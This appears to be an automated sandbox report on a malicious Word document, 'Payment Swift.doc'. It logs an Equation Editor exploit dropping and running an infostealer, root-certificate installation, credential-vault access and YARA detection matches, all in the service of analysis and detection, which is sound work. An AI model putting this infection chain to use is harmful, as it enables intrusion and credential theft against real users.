Source: 5.2.microme09255.scr.47c0000.7.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.microme09255.scr.332dd90.4.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.microme09255.scr.47c0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.microme09255.scr.332dd90.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.microme09255.scr.22cf214.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.microme09255.scr.22d1a54.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000005.00000002.348836350.00000000047C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\microme09255.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Process Stats: CPU usage > 49%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 5_2_001C3D2F	5_2_001C3D2F
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_00393900	6_2_00393900
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_0039F360	6_2_0039F360
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_00398C00	6_2_00398C00
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_00394518	6_2_00394518
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_0039BE88	6_2_0039BE88
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_00393C48	6_2_00393C48
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_0039E54A	6_2_0039E54A
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_00920980	6_2_00920980
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_009255F0	6_2_009255F0
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_00926550	6_2_00926550
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_00921A40	6_2_00921A40
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 6_2_00928778	6_2_00928778

Source: Payment Swift.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 5.2.microme09255.scr.47c0000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.microme09255.scr.332dd90.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.microme09255.scr.47c0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.microme09255.scr.332dd90.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.microme09255.scr.22cf214.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.microme09255.scr.22d1a54.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000005.00000002.348836350.00000000047C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector

Source: 5.2.microme09255.scr.344a420.5.raw.unpack, YsTq4S.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, YsTq4S.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, ZNczHvI78.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, ZNczHvI78.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, ZNczHvI78.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, ZNczHvI78.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, G2Tmmpnyphl.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.microme09255.scr.344a420.5.raw.unpack, G2Tmmpnyphl.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: 5.2.microme09255.scr.332dd90.4.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 5.2.microme09255.scr.47c0000.7.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr

Binary or memory string: 9NHY9.vBP_AKdRKKcR

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@7/9@2/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$yment Swift.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR63A2.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Payment Swift.doc	ReversingLabs: Detection: 43%
Source: Payment Swift.doc	Virustotal: Detection: 45%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Process created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\microme09255.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Payment Swift.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Payment Swift.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\microme09255.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: microm[1].scr.2.dr

Static PE information: 0xF0D93282 [Fri Jan 17 03:01:22 2098 UTC]

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00607A67 push esp; ret	2_2_00607A6B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00607A6F push esp; ret	2_2_00607A73
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00607A77 push esp; ret	2_2_00607A7B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060FA7E push esi; ret	2_2_0060FA7F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605452 push esi; ret	2_2_00605453
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0061002A push esp; ret	2_2_0061002B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00610032 push esp; ret	2_2_00610033
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060A8F2 push ebp; ret	2_2_0060A8F3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060A8FA push ebp; ret	2_2_0060A8FB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060F8AA push esi; ret	2_2_0060F8AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060F8B2 push esi; ret	2_2_0060F8B3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006052BE push esi; ret	2_2_006052BF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060FA86 push esi; ret	2_2_0060FA87
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00608366 push esp; ret	2_2_00608367
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060836E push esp; ret	2_2_0060836F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00608979 push esi; ret	2_2_0060897B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00606D25 push esi; ret	2_2_00606D27
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00606D1D push esi; ret	2_2_00606D1F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605FE2 push esi; ret	2_2_00605FE3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605FEA push esi; ret	2_2_00605FEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060C3AA push esp; ret	2_2_0060C3AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00608981 push esi; ret	2_2_00608983
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060658E push esp; ret	2_2_0060658F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00606596 push esp; ret	2_2_00606597
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Code function: 5_2_001C07C8 pushad ; retn 0017h	5_2_001C07E1

Source: microm[1].scr.2.dr	Static PE information: section name: .text entropy: 7.181612006870042
Source: microme09255.scr.2.dr	Static PE information: section name: .text entropy: 7.181612006870042

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\microme09255.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr			Jump to dropped file

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\microme09255.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
